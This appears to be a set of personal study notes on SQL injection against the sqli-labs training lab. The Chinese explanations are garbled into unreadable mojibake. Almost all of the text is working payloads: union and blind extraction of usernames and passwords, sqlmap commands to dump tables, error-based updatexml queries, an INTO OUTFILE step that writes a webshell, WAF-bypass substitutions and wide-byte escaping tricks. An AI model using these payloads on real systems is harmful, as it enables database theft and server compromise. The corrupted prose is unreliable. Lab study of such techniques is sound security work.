���ϲ�ѯ��䣺union select
������from oo_user where username=��root�� union select * from oo_user where username=��dsa��;
������Ҫ��ģ�root�� union select * from oo_user where username=��dsa
Sqlע��Ļ�������
1.�жϴ���������ֻ����ַ�������?id=1 and 1=2 —���������Ϣ�����֣�û�������ַ���
2.�����ݿ⣬�ȱպϣ�?id=-1������ʹ�á� union select 1,2,database() #
3.Ȼ����order by�鿴�ֶ�����?id=-1�� order by 3 # –ȷ�Ϻ�Ҫ��#�Ż���%23
4.��ȡ���ݿ⼰����Ϣ��1-1’ union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema=database() # –ȷ�Ϻ�Ҫ��#�Ż���%23
5.?id=-1’ union select 1, 2, group_concat(column_name) from information_schema.columns where table_name=”����”#
–�������ֶα���
5.-1�� union select �ֶ� from ���� # –�������� ����һ��Ҫ��group_concat()���ܲ�ѯ��
1’union select group_concat(username),group_concat(password) from security.users #
Sqlmap��ʹ�ã���win+r ��cmd��
1.sqlmap.py -u ��http://localhost/Less-5/?id=1�� –current-db (��ǰ�����ݿ�)
2.sqlmap.py -u http://localhost/Less-5/?id=1 –level=5 –risk=3 dbs ��web��php��mysql��apache�汾��
3.sqlmap.py -u “http://localhost/Less-5/?id=1“ –level=5 –risk=3 –dbms=mysql -D “security” –tables �����ݿ�ı���
4.sqlmap.py -u http://localhost/Less-5/?id=1 –level=5 –risk=3 –dsms=mysql -D “security” -T “users” –col �������ݿ�����ֶ�����
5.sqlmap.py -u http://localhost/Less-5/?id=1 –level=5 –risk=3 –dsms=mysql -D “security” -T “users” -C “password,username” -dump �������ݿ���е����ݣ�
����äע�������õij�����û�����ݻ��ԣ�������ȷ�н��������û���
���÷�ʽ:�����ж�������and��,����²⣨ä�£���
MID������MID(��dqwdad��,5,2) —–���ַ����ĵ���λ��ʼ��ȡ����ȡ��λ�ַ���
Substr������MIDһ��
Left������left(��adwawdwa��,5); —–�ӵ�һ���ַ���ʼ����ȡ����ַ���
ORD(��c��)��ASCII(��c��)��һ�������ã�����ת��ASCII��
�����ݿ⣨�ȳ��ȣ���������ƣ�
���ȣ�?id=1�� and length(database())=1 – qwe
���ƣ�?id=1�� and ascii(MID(database(),1,1))=���� – qwe
�����ݱ���������ƣ�
?id=1�� and ascii(substr(select table_name from information_schema.tables where table_schema=database() limit 1,1))=114 – qwe
���ֶ���
?id=1�� select substr((select colomn_name from information_schema.colomns where table_schema=�����ݿ����� and table_name=�����ݱ����� limit 0,1),1,1)=114 – qwe
�����ݣ�?id=1�� select ORD(select IFNULL(username AS CHAR),0x20) from security .users ORDER BY id LIMIT 0,1),1,1))=68 – qwe
Updatexml:���updatexml(Ŀ��xml����,xml�ĵ�·��,���µ�����)
updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
�жϿ�����
?id=1 ‘�жϱ�����
?id=1 ‘and updatexml(1,concat(0x7e,(SELECT table_name from information_schema.tables where table_schema=’security’ limit 3,1),0x7e),1) – qwe
�������
?id=1 ‘ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=’security’ and table_name=’emails’ limit 0,1),0x7e),1) – qwe
ע�⣺table_name��=�����п���ð�Ų���ת����url���ԣ����Լ�ת��������=%27��
�ж����ݣ�
?id=1�� and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1) – qew
������sqlע��©�����ڣ���õľ���ͨ��mysql��fileϵ�к��������ж�ȡ�����ļ�����д��webshell�����бȽϳ��õĺ�����һ�¼�����
into dumpfile() д�뺯��
Into outfile() д�뺯��
Load_file()
/ –б��һ������
\ –��б��Ҫ����
?id=1%27))%20union%20select%201,”“,3%20INTO%20OUTFILE%20”C:/phpstudy_pro/WWW/sqli-labs-master/Less-7/shell.php������Ҫ�ŵ�·����”–%20qwe
����ʱ���äע��
�ж����ݿ�ij��ȣ�
?id=1%27and%20if(length((select%20database()))>1,sleep(5),1)–+
��������wampͼ��ʲôʱ����ʾ��
��һ�ж��ַ���
?id=1’and if(ascii(substr((select database()),1,1))=115,sleep(5),1)–+
�ж����б������ȣ�
?id=1’and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)–+
��һ�жϱ�����
?id=1’and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)–+
�ж������ֶ����ij��ȣ�
?id=1’and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’))>20,sleep(5),1)–+
��һ�ж��ֶ�����
?id=1’and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’),1,1))>99,sleep(5),1)–+
�ж��ֶ����ݳ���
?id=1’ and if(length((select group_concat(username,password) from users))>109,sleep(5),1)–+
��һ������ݣ�
?id=1’ and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)–+
httpЭ�飺
Useragentע��
Referrerע�룺
cookieע�룺setcookie(name,value,expire) name �涨cookie������
Value �涨cookie��ֵ expire �涨cookie����Ч�ڡ�
����ѯ�����Ϳ������������ֶ�ֱ����������
Select * from (select * from users as a JOIN users as b using())c;
���滻�����дʣ�
and or : && ||
Order by : group by
Union select : union all select ���� union /!90000sd/ select
Information_schema.tables:sys.schema_table_statistics_with_buffer ���� sys.x$ps_schema_table_statistics_io
uni union%0Aselecton%0Aselect%0A ������union select ��һ�ַ�����sqli-labs28�أ�
ת\���ŵļ��㣺����\ǰ��%df��
?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()–+
��?id=-1?’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()–
union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273–+ ��������һ��д��
1%df’ union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273–+ ���ֶ���
1%df’ union select 1,group_concat(password,username) from users–+ �������˻� ���ֽ�ע�루������utf-8���ͣ�
�ѵ�ע�룺����ã�
��ǰ����ϱպ�;insert into users values(18,’icepeak’,’icepeak’)#